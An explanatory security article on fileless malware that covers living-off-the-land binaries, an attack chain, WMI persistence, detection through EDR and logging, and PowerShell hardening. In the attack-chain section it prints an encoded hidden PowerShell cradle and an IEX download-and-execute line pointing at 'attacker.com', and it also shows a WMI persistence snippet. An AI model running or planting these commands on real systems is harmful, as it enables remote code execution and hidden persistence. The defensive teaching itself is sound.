Fileless malware executes entirely in memory, using legitimate system tools to carry out malicious actions without ever writing files to disk. Traditional antivirus solutions scan files on disk — fileless malware simply avoids this detection layer entirely. As EDR (Endpoint Detection and Response) solutions have improved, fileless techniques have become increasingly prevalent in sophisticated attacks, from nation-state APTs to ransomware gangs.
How Fileless Malware Works
The key insight: every modern operating system includes powerful scripting and automation tools (PowerShell, WMI, cmd.exe, rundll32.exe) that can execute code. If malware leverages these existing tools rather than dropping malicious executables, there’s nothing on disk for traditional AV to scan.
Living off the Land (LotL)
Fileless attacks use “Living off the Land” binaries (LOLbins) — legitimate Windows tools with unexpected capabilities that attackers exploit:
| Binary | Legitimate Use | Attack Use |
|---|---|---|
| PowerShell | System automation | Execute encoded payloads, download shellcode |
| WMI (wmic.exe) | System management | Persistence, lateral movement, execution |
| Mshta.exe | HTML application host | Execute malicious HTA files |
| Regsvr32.exe | Register COM objects | Execute remote scripts via COM |
| Certutil.exe | Certificate management | Download and decode files |
| Rundll32.exe | Run DLL functions | Execute shellcode |
Typical Fileless Attack Chain
1. Initial delivery (the only disk-based component, often): A malicious Office macro, a phishing link, or a web exploit downloads a tiny loader — or triggers a PowerShell command directly.
2. PowerShell cradle: The initial access triggers a one-line PowerShell command:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc BASE64ENCODEDCOMMANDThe base64-encoded command downloads and executes additional PowerShell entirely in memory:
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')IEX (Invoke-Expression) executes the downloaded string as code — never written to disk.
3. In-memory execution: The payload runs entirely in PowerShell’s process memory. It may:
- Inject shellcode into legitimate processes (process injection)
- Load .NET assemblies from memory (not disk)
- Establish persistence via registry or WMI subscriptions (writing minimal footprint)
- Communicate with C2 via encrypted HTTPS — indistinguishable from normal web traffic
4. Process injection: Malicious code is injected into legitimate processes (lsass.exe, svchost.exe, Explorer.exe) to further hide activity. From an AV perspective, the suspicious behavior appears to come from a trusted process.
Common Fileless Techniques
PowerShell-Based Execution
The most common vector. PowerShell can:
- Download payloads directly into memory
- Use reflection to load .NET assemblies without touching disk
- Encode commands to bypass basic keyword detection
- Disable AMSI (Antimalware Scan Interface) via patching
WMI Persistence
WMI subscriptions can trigger code execution on system events without any executable files:
# Simplified WMI persistence example
$Filter = Set-WmiInstance -Class __EventFilter -Namespace root\subscription -Arguments @{
EventNamespace='root\cimv2';
Name='FilterName';
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'";
QueryLanguage='WQL'
}This creates a WMI event subscription that fires every 60 seconds — persisting across reboots without any files in startup locations.
Registry Execution
Malicious code stored in the registry, executed via:
HKCU\Software\Microsoft\Windows\CurrentVersion\Runwith a PowerShell command value- COM object hijacking — replacing registry entries for COM objects to redirect execution
Process Hollowing
A legitimate process (notepad.exe, calc.exe) is started in a suspended state, its memory contents replaced with malicious code, then resumed. To the OS and most AV tools, the executing process is “legitimate.”
Why Traditional AV Misses It
Traditional antivirus operates by:
- Scanning files on disk for known malicious signatures
- Heuristic analysis of file contents
- Checking file hashes against known bad databases
Fileless malware bypasses all three by having minimal or no disk presence. The malicious code lives in:
- Process memory (volatile — gone on reboot, unless persistence is established via registry/WMI)
- Legitimate system processes’ memory space
Detection Techniques
Behavioral EDR Monitoring
Modern EDR solutions (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) detect fileless malware through behavior:
- PowerShell spawning from Office applications
- Encoded PowerShell commands (base64)
- AMSI bypass patterns in memory
- Unusual network connections from scripting processes
- Process memory anomalies and injection patterns
Event Log Analysis
Enable and monitor:
- Event ID 4104 (PowerShell Script Block Logging): Captures all PowerShell code executed — including decoded base64
- Event ID 4688 (Process Creation): Logs every new process with command line arguments
- Event ID 4103 (Module Logging): Logs PowerShell pipeline execution
# Enable Script Block Logging
Set-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 1AMSI (Antimalware Scan Interface)
Windows 10+ includes AMSI, which intercepts script execution (PowerShell, VBScript, JScript) and scans it before execution — even for in-memory scripts. AV vendors hook into AMSI to scan content that never touches disk.
Attackers attempt to bypass AMSI via reflection patching — monitoring for this is a useful detection opportunity.
Defenses
Constrained Language Mode: Limit PowerShell capabilities on endpoints:
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'PowerShell Version 2 removal: PS v2 lacks AMSI and logging — attackers downgrade to it. Remove it:
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2RootAppLocker/WDAC: Whitelist applications that can execute — prevents LOLbin abuse.
Attack Surface Reduction (ASR) Rules: Microsoft Defender’s ASR rules block many fileless attack techniques (Office spawning PowerShell, obfuscated scripts, etc.).
Fileless malware demonstrates that perimeter and file-based defenses are insufficient alone. Behavioral monitoring, script logging, and EDR solutions that analyze memory and process behavior are now required components of a modern defensive stack.